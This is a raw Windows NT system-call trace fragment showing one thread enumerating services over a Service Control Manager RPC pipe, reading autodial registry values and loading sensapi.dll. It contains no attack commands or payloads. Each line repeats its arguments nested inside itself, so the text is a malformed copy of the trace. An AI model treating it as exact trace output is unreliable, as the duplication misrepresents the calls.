 04063   712   NtFsControlFile  (620, 609, 0x0, 0x0, 0x11c017,  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\4\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0\372a-K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=56}, "\5\0\2\3\20\0\0\08\0\0\0\3\0\0\0 \0\0\0\0\0\0\0 \0\0\0\1\0\0\0\0\0\0\05\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , 44, 1024, ... {status=0x103, info=56},  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\4\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0\372a-K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=56}, "\5\0\2\3\20\0\0\08\0\0\0\3\0\0\0 \0\0\0\0\0\0\0 \0\0\0\1\0\0\0\0\0\0\05\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , ) == 0x103
 04064   712   NtFsControlFile  (620, 609, 0x0, 0x0, 0x11c017,  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\5\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0\371a-K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\4\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , 44, 1024, ... {status=0x103, info=48},  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\5\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0\371a-K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\4\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , ) == 0x103
 04065   712   NtReleaseMutant  (452, ... 0x0, ) == 0x0
 04066   712   NtQueryValueKey  (376,  (376, "EnableAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (376, "EnableAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 04067   712   NtQueryValueKey  (376,  (376, "NoNetAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (376, "NoNetAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 04068   712   NtOpenEvent  (0x100000, {24, 64, 0x0, 0, 0,  (0x100000, {24, 64, 0x0, 0, 0, "Global\SvcctrlStartEvent_A3752DX"}, ... 624, ) }, ... 624, ) == 0x0
 04069   712   NtWaitForSingleObject  (624, 0, {-1800000000, -1}, ... ) == 0x0
 04070   712   NtClose  (624, ... ) == 0x0
 04071   712   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 04072   712   NtFsControlFile  (620, 609, 0x0, 0x0, 0x11c017,  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0$\0\0\0\6\0\0\0\14\0\0\0\0\0\33\0\0\0\0\0\0\0\0\0\0\0\0\200", 36, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\5\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , 36, 1024, ... {status=0x103, info=48},  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0$\0\0\0\6\0\0\0\14\0\0\0\0\0\33\0\0\0\0\0\0\0\0\0\0\0\0\200", 36, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\5\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , ) == 0x103
 04073   712   NtFsControlFile  (620, 609, 0x0, 0x0, 0x11c017,  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\7\0\0\0(\0\0\0\0\0\32\0\0\0\0\0\373a-K\351?\334\21\261\310\0\14)\371\246\3050\0\0\0\1\0\0\0@\2\0\0<\376x\1\0\0\0\0", 64, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\6\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\373a-K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , 64, 1024, ... {status=0x103, info=48},  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\7\0\0\0(\0\0\0\0\0\32\0\0\0\0\0\373a-K\351?\334\21\261\310\0\14)\371\246\3050\0\0\0\1\0\0\0@\2\0\0<\376x\1\0\0\0\0", 64, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\6\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\373a-K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , ) == 0x103
 04074   712   NtWaitForSingleObject  (609, 0, 0x0, ... ) == 0x0
 04075   712   NtFsControlFile  (620, 609, 0x0, 0x0, 0x11c017,  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\10\0\0\0(\0\0\0\0\0\32\0\0\0\0\0\373a-K\351?\334\21\261\310\0\14)\371\246\3050\0\0\0\1\0\0\0@\2\0\0<\376x\12\0\0\0", 64, 1024, ... {status=0x103, info=624}, "\5\0\2\3\20\0\0\0p\2\0\0\7\0\0\0X\2\0\0\0\0\0\0@\2\0\0.\2\0\0\22\2\0\0 \0\0\0\4\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\2\0\0\340\1\0\0 \0\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\316\1\0\0\240\1\0\0 \0\0\0\4\0\0\0\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\226\1\0\0~\1\0\0 \0\0\0\4\0\0\0\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0l\1\0\0B\1\0\0 \0\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\1\0\0\32\1\0\0 \0\0\0\4\0\0\0\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\16\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0E\0R\0S\0v\0c\0\0\0DNS Client\0\0i\0e\0n\0t\0\0\0Dnscache\0\0c\0h\0e\0\0\0Logical Disk Manager\0\0k\0 \0M\0a\0n\0a\0g\0e\0r\0\0\0dmserver\0\0v\0e\0r\0\0\0DHCP Client\0l\0i\0e\0n\0t\0\0\0Dhcp\0\0p\0\0\0Cryptographic Services\0\0c\0 \0S\0e\0r\0v\0i\0c\0e\0s\0\0\0CryptSvc\0\0", ) , 64, 1024, ... {status=0x103, info=624},  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\10\0\0\0(\0\0\0\0\0\32\0\0\0\0\0\373a-K\351?\334\21\261\310\0\14)\371\246\3050\0\0\0\1\0\0\0@\2\0\0<\376x\12\0\0\0", 64, 1024, ... {status=0x103, info=624}, "\5\0\2\3\20\0\0\0p\2\0\0\7\0\0\0X\2\0\0\0\0\0\0@\2\0\0.\2\0\0\22\2\0\0 \0\0\0\4\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\2\0\0\340\1\0\0 \0\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\316\1\0\0\240\1\0\0 \0\0\0\4\0\0\0\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\226\1\0\0~\1\0\0 \0\0\0\4\0\0\0\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0l\1\0\0B\1\0\0 \0\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\1\0\0\32\1\0\0 \0\0\0\4\0\0\0\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\16\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0E\0R\0S\0v\0c\0\0\0DNS Client\0\0i\0e\0n\0t\0\0\0Dnscache\0\0c\0h\0e\0\0\0Logical Disk Manager\0\0k\0 \0M\0a\0n\0a\0g\0e\0r\0\0\0dmserver\0\0v\0e\0r\0\0\0DHCP Client\0l\0i\0e\0n\0t\0\0\0Dhcp\0\0p\0\0\0Cryptographic Services\0\0c\0 \0S\0e\0r\0v\0i\0c\0e\0s\0\0\0CryptSvc\0\0", ) , ) == 0x103
 04076   712   NtFsControlFile  (620, 609, 0x0, 0x0, 0x11c017,  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\11\0\0\0(\0\0\0\0\0\32\0\0\0\0\0\373a-K\351?\334\21\261\310\0\14)\371\246\3050\0\0\0\1\0\0\0@\2\0\0<\376x\1>\0\0\0", 64, 1024, ... {status=0x103, info=624}, "\5\0\2\3\20\0\0\0p\2\0\0\10\0\0\0X\2\0\0\0\0\0\0@\2\0\04\2\0\0\4\2\0\0 \0\0\0\4\0\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\362\1\0\0\336\1\0\0 \0\0\0\4\0\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\306\1\0\0\242\1\0\0 \0\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0d\1\0\0 \1\0\0 \0\0\0\4\0\0\0\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\20\1\0\0\356\0\0\0 \0\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Help and Support\0\0S\0u\0p\0p\0o\0r\0t\0\0\0helpsvc\0s\0v\0c\0\0\0Fast User Switching Compatibility\0n\0g\0 \0C\0o\0m\0p\0a\0t\0i\0b\0i\0l\0i\0t\0y\0\0\0FastUserSwitchingCompatibility\0\0g\0C\0o\0m\0p\0a\0t\0i\0b\0i\0l\0i\0t\0y\0\0\0COM+ Event System\0t\0 \0S\0y\0s\0t\0e\0m\0\0\0EventSystem\0y\0s\0t\0", ) , 64, 1024, ... {status=0x103, info=624},  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\11\0\0\0(\0\0\0\0\0\32\0\0\0\0\0\373a-K\351?\334\21\261\310\0\14)\371\246\3050\0\0\0\1\0\0\0@\2\0\0<\376x\1>\0\0\0", 64, 1024, ... {status=0x103, info=624}, "\5\0\2\3\20\0\0\0p\2\0\0\10\0\0\0X\2\0\0\0\0\0\0@\2\0\04\2\0\0\4\2\0\0 \0\0\0\4\0\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\362\1\0\0\336\1\0\0 \0\0\0\4\0\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\306\1\0\0\242\1\0\0 \0\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0d\1\0\0 \1\0\0 \0\0\0\4\0\0\0\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\20\1\0\0\356\0\0\0 \0\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Help and Support\0\0S\0u\0p\0p\0o\0r\0t\0\0\0helpsvc\0s\0v\0c\0\0\0Fast User Switching Compatibility\0n\0g\0 \0C\0o\0m\0p\0a\0t\0i\0b\0i\0l\0i\0t\0y\0\0\0FastUserSwitchingCompatibility\0\0g\0C\0o\0m\0p\0a\0t\0i\0b\0i\0l\0i\0t\0y\0\0\0COM+ Event System\0t\0 \0S\0y\0s\0t\0e\0m\0\0\0EventSystem\0y\0s\0t\0", ) , ) == 0x103
 04077   712   NtWaitForSingleObject  (609, 0, 0x0, ... ) == 0x0
 04078   712   NtFsControlFile  (620, 609, 0x0, 0x0, 0x11c017,  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\12\0\0\0(\0\0\0\0\0\32\0\0\0\0\0\373a-K\351?\334\21\261\310\0\14)\371\246\3050\0\0\0\1\0\0\0@\2\0\0<\376x\1p\0\0\0", 64, 1024, ... {status=0x103, info=624}, "\5\0\2\3\20\0\0\0p\2\0\0\11\0\0\0X\2\0\0\0\0\0\0@\2\0\0&\2\0\0\30\2\0\0 \0\0\0\4\0\0\0\7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\364\1\0\0\334\1\0\0 \0\0\0\4\0\0\0\7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\314\1\0\0\240\1\0\0 \0\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\214\1\0\0x\1\0\0 \0\0\0\4\0\0\0\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0j\1\0\0B\1\0\0 \1\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0:\1\0\0\370\0\0\0 \0\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Network Location Awareness (NLA)\0\0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0\0\0Nla\0a\0\0\0Network Connections\0n\0n\0e\0c\0t\0i\0o\0n\0s\0\0\0Netman\0\0a\0n\0\0\0Messenger\0n\0g\0e\0r\0\0\0Messenger\0n\0g\0e\0r\0\0\0TCP/IP NetBIOS Helper\0I\0O\0S\0 \0H\0e\0l\0p\0e\0r\0\0\0LmHosts\0s\0t\0", ) , 64, 1024, ... {status=0x103, info=624},  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\12\0\0\0(\0\0\0\0\0\32\0\0\0\0\0\373a-K\351?\334\21\261\310\0\14)\371\246\3050\0\0\0\1\0\0\0@\2\0\0<\376x\1p\0\0\0", 64, 1024, ... {status=0x103, info=624}, "\5\0\2\3\20\0\0\0p\2\0\0\11\0\0\0X\2\0\0\0\0\0\0@\2\0\0&\2\0\0\30\2\0\0 \0\0\0\4\0\0\0\7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\364\1\0\0\334\1\0\0 \0\0\0\4\0\0\0\7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\314\1\0\0\240\1\0\0 \0\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\214\1\0\0x\1\0\0 \0\0\0\4\0\0\0\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0j\1\0\0B\1\0\0 \1\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0:\1\0\0\370\0\0\0 \0\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Network Location Awareness (NLA)\0\0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0\0\0Nla\0a\0\0\0Network Connections\0n\0n\0e\0c\0t\0i\0o\0n\0s\0\0\0Netman\0\0a\0n\0\0\0Messenger\0n\0g\0e\0r\0\0\0Messenger\0n\0g\0e\0r\0\0\0TCP/IP NetBIOS Helper\0I\0O\0S\0 \0H\0e\0l\0p\0e\0r\0\0\0LmHosts\0s\0t\0", ) , ) == 0x103
 04079   712   NtFsControlFile  (620, 609, 0x0, 0x0, 0x11c017,  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\13\0\0\0(\0\0\0\0\0\32\0\0\0\0\0\373a-K\351?\334\21\261\310\0\14)\371\246\3050\0\0\0\1\0\0\0@\2\0\0<\376x\1\242\0\0\0", 64, 1024, ... {status=0x103, info=624}, "\5\0\2\3\20\0\0\0p\2\0\0\12\0\0\0X\2\0\0\0\0\0\0@\2\0\0.\2\0\0\22\2\0\0 \0\0\0\4\0\0\0\204\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\372\1\0\0\334\1\0\0 \0\0\0\4\0\0\0\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\272\1\0\0\226\1\0\0 \1\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0x\1\0\0X\1\0\0 \0\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0L\1\0\0\24\1\0\0 \0\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\10\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0S\0a\0m\0S\0s\0\0\0Remote Procedure Call (RPC)\0r\0e\0 \0C\0a\0l\0l\0 \0(\0R\0P\0C\0)\0\0\0RpcSs\0S\0s\0\0\0Remote Registry\0e\0g\0i\0s\0t\0r\0y\0\0\0RemoteRegistry\0\0g\0i\0s\0t\0r\0y\0\0\0Protected Storage\0 \0S\0t\0o\0r\0a\0g\0e\0\0\0ProtectedStorage\0\0S\0t\0o\0r\0a\0g\0", ) , 64, 1024, ... {status=0x103, info=624},  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\13\0\0\0(\0\0\0\0\0\32\0\0\0\0\0\373a-K\351?\334\21\261\310\0\14)\371\246\3050\0\0\0\1\0\0\0@\2\0\0<\376x\1\242\0\0\0", 64, 1024, ... {status=0x103, info=624}, "\5\0\2\3\20\0\0\0p\2\0\0\12\0\0\0X\2\0\0\0\0\0\0@\2\0\0.\2\0\0\22\2\0\0 \0\0\0\4\0\0\0\204\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\372\1\0\0\334\1\0\0 \0\0\0\4\0\0\0\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\272\1\0\0\226\1\0\0 \1\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0x\1\0\0X\1\0\0 \0\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0L\1\0\0\24\1\0\0 \0\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\10\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0S\0a\0m\0S\0s\0\0\0Remote Procedure Call (RPC)\0r\0e\0 \0C\0a\0l\0l\0 \0(\0R\0P\0C\0)\0\0\0RpcSs\0S\0s\0\0\0Remote Registry\0e\0g\0i\0s\0t\0r\0y\0\0\0RemoteRegistry\0\0g\0i\0s\0t\0r\0y\0\0\0Protected Storage\0 \0S\0t\0o\0r\0a\0g\0e\0\0\0ProtectedStorage\0\0S\0t\0o\0r\0a\0g\0", ) , ) == 0x103
 04080   712   NtFsControlFile  (620, 609, 0x0, 0x0, 0x11c017,  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\14\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0\373a-K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=624}, "\5\0\2\3\20\0\0\0p\2\0\0\13\0\0\0X\2\0\0\0\0\0\0@\2\0\04\2\0\0\0\2\0\0 \0\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\356\1\0\0\320\1\0\0 \1\0\0\4\0\0\0G\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\276\1\0\0\236\1\0\0 \1\0\0\4\0\0\0\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\224\1\0\0`\1\0\0 \0\0\0\4\0\0\0A\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0>\1\0\0\14\1\0\0 \0\0\0\4\0\0\0\207\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\0\0\0\340\0\0\0\20\1\0\0\4\0\0\0E\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Print Spooler\0p\0o\0o\0l\0e\0r\0\0\0Spooler\0l\0e\0r\0\0\0Shell Hardware Detection\0\0e\0 \0D\0e\0t\0e\0c\0t\0i\0o\0n\0\0\0ShellHWDetection\0\0t\0e\0c\0t\0i\0o\0n\0\0\0System Event Notification\0N\0o\0t\0i\0f\0i\0c\0a\0t\0i\0o\0n\0\0\0SENS\0\0S\0\0\0Secondary Logon\0y\0 \0L\0o\0g\0o\0n\0\0\0seclogon\0\0g\0o\0n\0\0\0Task Sch", ) , 44, 1024, ... {status=0x103, info=624},  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\14\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0\373a-K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=624}, "\5\0\2\3\20\0\0\0p\2\0\0\13\0\0\0X\2\0\0\0\0\0\0@\2\0\04\2\0\0\0\2\0\0 \0\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\356\1\0\0\320\1\0\0 \1\0\0\4\0\0\0G\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\276\1\0\0\236\1\0\0 \1\0\0\4\0\0\0\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\224\1\0\0`\1\0\0 \0\0\0\4\0\0\0A\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0>\1\0\0\14\1\0\0 \0\0\0\4\0\0\0\207\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\0\0\0\340\0\0\0\20\1\0\0\4\0\0\0E\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Print Spooler\0p\0o\0o\0l\0e\0r\0\0\0Spooler\0l\0e\0r\0\0\0Shell Hardware Detection\0\0e\0 \0D\0e\0t\0e\0c\0t\0i\0o\0n\0\0\0ShellHWDetection\0\0t\0e\0c\0t\0i\0o\0n\0\0\0System Event Notification\0N\0o\0t\0i\0f\0i\0c\0a\0t\0i\0o\0n\0\0\0SENS\0\0S\0\0\0Secondary Logon\0y\0 \0L\0o\0g\0o\0n\0\0\0seclogon\0\0g\0o\0n\0\0\0Task Sch", ) , ) == 0x103
 04081   712   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "sensapi.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04082   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\sensapi.dll"}, 24704628, ... ) }, 24704628, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04083   712   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "sensapi.dll"}, 24704628, ... ) }, 24704628, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04084   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\sensapi.dll"}, 24704628, ... ) }, 24704628, ... ) == 0x0
 04085   712   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\sensapi.dll"}, 5, 96, ... 624, {status=0x0, info=1}, ) }, 5, 96, ... 624, {status=0x0, info=1}, ) == 0x0
 04086   712   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 624, ... 628, ) == 0x0
 04087   712   NtQuerySection  (628, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 04088   712   NtClose  (624, ... ) == 0x0
 04089   712   NtMapViewOfSection  (628, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x722b0000), 0x0, 20480, ) == 0x0
 04090   712   NtClose  (628, ... ) == 0x0
 04091   712   NtOpenSection  (0x4, {24, 64, 0x0, 0, 0,  (0x4, {24, 64, 0x0, 0, 0, "SENS Information Cache"}, ... 628, ) }, ... 628, ) == 0x0
 04092   712   NtMapViewOfSection  (628, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 2, ... (0x1790000), {0, 0}, 4096, ) == 0x0
 04093   712   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 624, ) == 0x0
 04094   712   NtConnectPort  ( ("\RPC Control\senssvc", {12, 2, 1, 1}, 0x0, 0x0, 24705092, 112, ... 632, 0x0, 0x0, 0x0, 112, ) , {12, 2, 1, 1}, 0x0, 0x0, 24705092, 112, ... 632, 0x0, 0x0, 0x0, 112, ) == 0x0
 04095   712   NtRequestWaitReplyPort  (632, {128, 152, new_msg, 0, 1310720, 128536, 1310720, 24704856}  (632, {128, 152, new_msg, 0, 1310720, 128536, 1310720, 24704856} "\0$\370w\10\376x\1\2$\370w$\344\373c) \321\21\215\270\0\252\0J\275^\1\0\0\0\1\0\0\0\300X\27\0\4\0\0\0\300X\27\0\20\344\314w\300X\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\3\0\0\0\0\0\212\0\0\300x=$\0\0\0+r\0\0+\0\220X\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\360\375\177\5\0\0\0" ... {128, 152, reply, 0, 452, 712, 1577, 0} "\7$\370w\10\376x\1\2$\370w$\344\373c) \321\21\215\270\0\252\0J\275^\1\0\0\0\1\0\0\0\0\0\0\0\4\0\0\0\300X\27\0\377\377\377\377\300X\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\3\0\0\0\0\0\212\0\0\300x=$\0\0\0+r\0\0+\0\220X\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\360\375\177\5\0\0\0" )  ... {128, 152, reply, 0, 452, 712, 1577, 0}  (632, {128, 152, new_msg, 0, 1310720, 128536, 1310720, 24704856} "\0$\370w\10\376x\1\2$\370w$\344\373c) \321\21\215\270\0\252\0J\275^\1\0\0\0\1\0\0\0\300X\27\0\4\0\0\0\300X\27\0\20\344\314w\300X\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\3\0\0\0\0\0\212\0\0\300x=$\0\0\0+r\0\0+\0\220X\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\360\375\177\5\0\0\0" ... {128, 152, reply, 0, 452, 712, 1577, 0} "\7$\370w\10\376x\1\2$\370w$\344\373c) \321\21\215\270\0\252\0J\275^\1\0\0\0\1\0\0\0\0\0\0\0\4\0\0\0\300X\27\0\377\377\377\377\300X\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\3\0\0\0\0\0\212\0\0\300x=$\0\0\0+r\0\0+\0\220X\27\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\360\375\177\5\0\0\0" )  ) == 0x0
